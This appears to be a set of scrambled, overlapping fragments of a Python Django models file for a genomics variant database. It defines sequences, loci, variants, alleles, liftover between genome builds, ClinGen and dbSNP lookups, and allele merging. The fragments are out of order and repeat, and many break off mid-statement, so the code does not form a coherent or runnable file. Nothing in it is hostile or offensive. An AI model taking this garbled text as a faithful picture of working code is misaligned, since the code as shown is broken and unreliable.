"insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence,",
"= self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool",
"va.variant) va.delete() return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True)))",
"have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save()",
"conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return",
"class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def",
"for the row) There is only 1 Variant for a given locus/alt per",
"@staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done",
"have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: #",
"f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge()",
"\"\"\" Variants represent the different alleles at a locus Usually 2+ per line",
"models.JSONField(null=True) # Only set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\")",
"self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele",
"if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele",
"import settings from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models",
"}, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele",
"save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update,",
"we can add that unique_together constraint We only expect to store Alleles for",
"def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)",
"self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return",
"and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele =",
"variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for",
"\"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class",
"needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server",
"the same as ClinGen or 2 loci in a genome build being represented",
"md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20):",
"across ClinGen Allele (may not have been possible to retrieve in all builds,",
"import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import",
"%s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def",
"-> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant",
"reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager",
"variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)",
"va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\",",
"{self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()}",
"get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs",
"self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self)",
"get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:",
":= self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param",
"for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple =",
"= ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom =",
"models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading",
"return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool:",
"and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True):",
"models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True)",
"line in a VCF file (ref + >= 1 alts pointing to the",
"\"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)",
"= set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in",
"= models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a",
"genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs",
"< self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length",
"= conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting",
"and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference",
"return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele",
"in a VCF file (multiple Variants with different alt alleles point to the",
"if there is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id})",
"class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return",
"def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern",
"1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share MT and some",
"= models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is",
"Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def",
"position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref,",
"AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple",
"md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele",
"Locus/Variant can have unique constraints) Postgres by default uses indexes for constraints, and",
"is None: if self.error: # Retry if server was down return self.error.get(\"errorType\") ==",
"conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this",
"\"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class",
"= Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position),",
"= models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin =",
"vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version :=",
"ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}') if not",
"Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params =",
"build) is set in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE)",
"ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move",
"ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return",
"raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele}",
"calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\",",
"import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import",
"Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was",
"AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source",
"unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return",
"variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build:",
"@staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\"",
"genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool",
"alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple",
"(chrom, position, ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom,",
"you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp",
"= (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build:",
"VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to",
"@staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build,",
"other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error",
"drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of",
"f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover =",
"variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod",
"pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is",
"error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele}",
"is only 1 Locus for a given chrom/position/ref per database (handled via insertion",
"= models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False,",
"f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used",
"guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres by default",
"VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from",
"IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE,",
"@property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length",
"return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool:",
"None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return",
"source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model):",
"liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE)",
"format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE)",
"return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error",
"for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool",
"get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\"",
"build For others (NCBI Remap) we need to write the source genome build",
"models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True)",
"LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True,",
"import django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db import",
"Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User",
"ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild,",
"the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib",
"GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate:",
"liftover. Can be slow (API call) If you know a VariantAllele exists for",
"not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str,",
"@staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property",
"Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import",
"allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\"",
"or reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def",
"on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return",
"-> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if",
"-> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self)",
"self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length <",
"lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos",
"the constraint on that. Another possible solution is to use Gist indexes but",
"origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only",
"unplaced scaffolds) - in those cases # we'll have the same variant linked",
"str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return",
"and large TextFields give error of: \"index row requires x bytes, maximum size",
"v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user:",
"self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete:",
"VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild,",
"contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp:",
"conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class",
"liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class",
"return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name",
"GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal",
"genome build to resolve to the same allele (due to our normalization not",
"VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show",
"for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool",
"one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return",
"self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple Variants",
"We only expect to store Alleles for a small fraction of Variants So",
"alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track",
"version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self,",
"existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all():",
"models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos",
"annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style",
"instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build)",
"- {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as",
"to Allele.pk and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg",
"from the same genome build to resolve to the same allele (due to",
"others (NCBI Remap) we need to write the source genome build VCF first",
"variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def",
"want them on the Variant object - instead do 1-to-1 \"\"\" # Some",
"models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success",
"change point to same allele This is generally done via ClinGen Allele Registry,",
"self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig",
"snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN =",
"= True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele",
"gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig =",
"get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) ->",
"ClinGen AlleleRegistry) we can write the VCF in the desired genome build For",
"row requires x bytes, maximum size is 8191\" The easiest solution is to",
"raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection:",
"allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def",
"f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop",
"import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text",
"not va and not best_attempt: raise ValueError(f'Could not find a variant in allele",
"# Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return",
"conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this",
"builds, but at least one # links there, and can't have another, so",
"= Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod",
"alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)",
"We want to guarantee seq is unique (so Locus/Variant can have unique constraints)",
"models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want",
"# pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id,",
"genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource \"\"\"",
"status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\"",
"self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is one, otherwise",
"-> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover. Can",
"source genome build VCF first Alleles must have already been created - allele_source",
"match and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\":",
"get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern -",
"class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele} failed {self.liftover}: {self.error_message}\"",
"g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\")",
"{merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if",
"update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) > max_length:",
"!= ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self):",
"this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self} to",
"small fraction of Variants So don't want them on the Variant object -",
"= variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele:",
"postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add",
"return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build",
"generally done via ClinGen Allele Registry, but sometimes that can fail. Linked against",
"genome build VCF first Alleles must have already been created - allele_source used",
"chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent",
"return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via",
"__str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants -",
"is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def",
"django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db import models,",
"django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from",
"\"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)",
"r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome",
"fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)",
"dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs,",
"to our normalization not being the same as ClinGen or 2 loci in",
"possible to retrieve in all builds, but at least one # links there,",
"2 loci in a genome build being represented by 1 loci in the",
"constraint on that. Another possible solution is to use Gist indexes but that",
"abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position}",
"Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >=",
"= vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not find a",
"from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if",
"VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy",
"receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy",
"same allele This is generally done via ClinGen Allele Registry, but sometimes that",
"= Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build:",
"given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus",
"django.db import models, IntegrityError from django.db.models import Value as V, QuerySet, F from",
"missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37:",
"return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can",
